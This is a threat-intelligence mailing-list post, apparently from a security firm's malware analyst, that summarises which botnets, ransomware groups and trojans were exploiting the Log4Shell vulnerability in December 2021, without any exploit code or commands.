[MART] - Daily Diary #414 - Log4Shell Exploited By Multiple Threat Actors

CTAS-MAT ctas-mat at appgate.com
Fri Dec 17 21:11:09 UTC 2021


Hello,

I hope everyone is doing well!

Below is the entry for today.

12/17/2021 - Diary entry #414:

Since Log4Shell is a critical flaw with a huge attack surface and is very simple to exploit, threat actors are actively using it to launch their attacks even with a patch already released. Several state-sponsored groups are exploiting the flaw in the wild and making modifications to the Log4j exploit.

We have seen several threat actors, not state-sponsored, exploiting the Log4J vulnerability. Botnets like Muhstik and a Mirai-variant, for example, were exploiting the flaw on Linux devices before it was publicly disclosed.

Exploitation and post-exploitation activities were also observed, including the deployment of cryptocurrency miners like XMRIG and Cobalt Strike beacons used to exfiltrate data from compromised systems.

More recently, a new Ransomware family named Khonsari emerged by exploiting the Log4J vulnerability in the wild. We covered this new Ransomware yesterday on Daily Diary #413.

The Orcus Remote Access Trojan, active since 2016 and commercialized among threat actors, was also delivered during a Log4J exploitation attack. Lastly, Conti Ransomware appeared exploiting Log4Shell to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.

Besides all those threats, simple reverse shell command lines have been executed by exploiting the vulnerability as well, so basically, any threat actor can leverage this new vector in the wild. Including using exploit variants to bypass basic security protections on yet unpatched systems. Our team was expecting notorious Ransomware groups like Lockbit, Hive, Groove to exploit it and breach new victims, which already happened as mentioned above about Conti Ransomware.

Kind Regards,

[https://d3aafpijpsak2t.cloudfront.net/images/Signature/logo@2x.png]<https://www.appgate.com/>

[https://d3aafpijpsak2t.cloudfront.net/images/Signature/likedin@2x.png]<https://www.linkedin.com/company/appgate-security/>     [https://d3aafpijpsak2t.cloudfront.net/images/Signature/twitter@2x.png] <https://twitter.com/AppgateSecurity>   [https://d3aafpijpsak2t.cloudfront.net/images/Signature/youtube@2x.png] <https://www.youtube.com/channel/UC-8GvxcZbm-R3EJNl8jYjiQ>



Felipe Tarijon de Almeida
Malware Analyst
Appgate

E: felipe.tarijon at appgate.com<mailto:felipe.tarijon at appgate.com>
O: +55 11 97467 9549

-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.immunityinc.com/pipermail/mart/attachments/20211217/de33c12f/attachment.htm>


More information about the MART mailing list